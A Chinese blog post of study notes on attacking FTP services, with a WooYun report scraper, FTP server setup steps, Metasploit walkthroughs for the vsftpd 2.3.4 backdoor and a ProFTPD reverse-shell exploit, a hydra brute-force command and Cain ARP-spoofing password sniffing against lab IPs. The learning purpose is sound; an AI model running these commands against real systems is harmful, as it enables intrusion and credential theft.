端口与服务-ftp服务

端口与服务-ftp服务

1概述

1.1.从先知和乌云上爬取端口历史漏洞报告,总结报告

1.2.全面总结,出具一个表格之类的汇总表

2.ftp

# -*- coding: utf-8 -*-
import requests,re,sys
def wooyun_chax(keywords,page):
    url = "https://wooyun.x10sec.org/search?keywords="+keywords+"&&content_search_by=by_bugs&&search_by_html=False&&page="+page
    print(url)
    req = requests.get(url)
    text = req.text
    r = re.findall('<td><a href="(.*?)" target="_blank">\s(.*?)</a>',text)
    for i in r:
        print("漏洞名称:"+i[1])
        print("漏洞链接:"+"https://wooyun.x10sec.org/"+i[0])
        print("漏洞总结:")
wooyun_chax(sys.argv[1],sys.argv[2])
2.1 ftp搭建

 iis搭建

1.安装ftp服务:控制面板-程序和功能-打开或关闭windows功能-internet信息服务-ftp服务
2.查询ftp服务:计算机-管理-iis
3.创建一个ftp站点:右键-添加ftp站点-填写站点名称/目录-端口和IP-权限设置
4.启动

FileZillaServer搭建

1.安装:FileZillaServer-百度搜索下载-安装,打开
2.设置:打开-设置端口-edit-users-shared folders设置目录-添加用户-general设置密码
3.查看日志:edit-settings

2.2典型案列

1.后门vsftpd  https://www.freebuf.com/column/143480.html

总结

   1.搜索:钟馗之眼搜索 product:vsftpd 2.3.4
   2.nmap漏洞探测:nmap --script=vuln且提示anonymous可以匿名登录
   3.msf攻击
            1.use exploit/unix/ftp/vsftpd_234_backdoor
            2.set rhost和rport
       3.exploit攻击
            4.创建用户,提权

2.ftp远程代码溢出  https://blog.csdn.net/weixin_42214273/article/details/82892282

总结

  1.环境:靶机 192.168.88.165 攻击机 192.168.88.138
  2.扫描:nmap -sV 192.168.88.165 扫描服务和版本
  nmap -A -v 192.168.88.165 扫描全部信息 不好用
  nmap -O 192.168.88.165 探测靶场的操作系统类型与版本
  3.发现开启的服务:ftp proftpd 1.3.3c
  4.在kali中搜索漏洞:searchsploit ProFTPD 1.3.3c 未找到
  5.msf中搜索相应漏洞模块:search ProFTPD 1.3.3c
    配置1.设置payload set payload cmd/unix/reverse
    2.设置lhost和rhost
    3.exploit攻击
    4.id查看
    5.端口优化:python –c “import pty;pty.spawn(‘/bin/bash’)”
    6.获取flag:一般flag放在root下 cd /root

3.ftp跳转攻击。 https://blog.csdn.net/mgxcool/article/details/48249473

 

2.3 攻击方式

ftp://192.168.43.85 1.正常输入uname和paw登陆,显示乱码。解决:控制面板-区域和语言-当前系统区域设置-设置为中文(简体,中国) 

                               2.匿名访问 用户名:anonymous 密码:为空或者任意邮箱

                               3.直接访问

                               4.暴力猜解 hydra 192.168.43.85 ftp -L username.txt -P pwd.txt -o 111.txt

                               5.后门vsftpd

                               6.ftp远程代码溢出

                               7.跳转攻击

                              8.嗅探  cain嗅探ftp密码

 2.4 cain嗅探ftp密码

1.设置 网卡设置cain-configure-sniffer-选择用于嗅探的网卡
arp中可以设置伪造的ip和mac地址
端口设置filters and ports-设置嗅探的端口
2.操作 找到被欺骗的IP:点击sniffer-scan mac address-打开arp页面-选择被欺骗的IP
点击嗅探
结果:passwords处显示抓取的密码

posted @ 2019-12-20 17:02  强壮的脸皮  阅读(384)  评论(2编辑  收藏  举报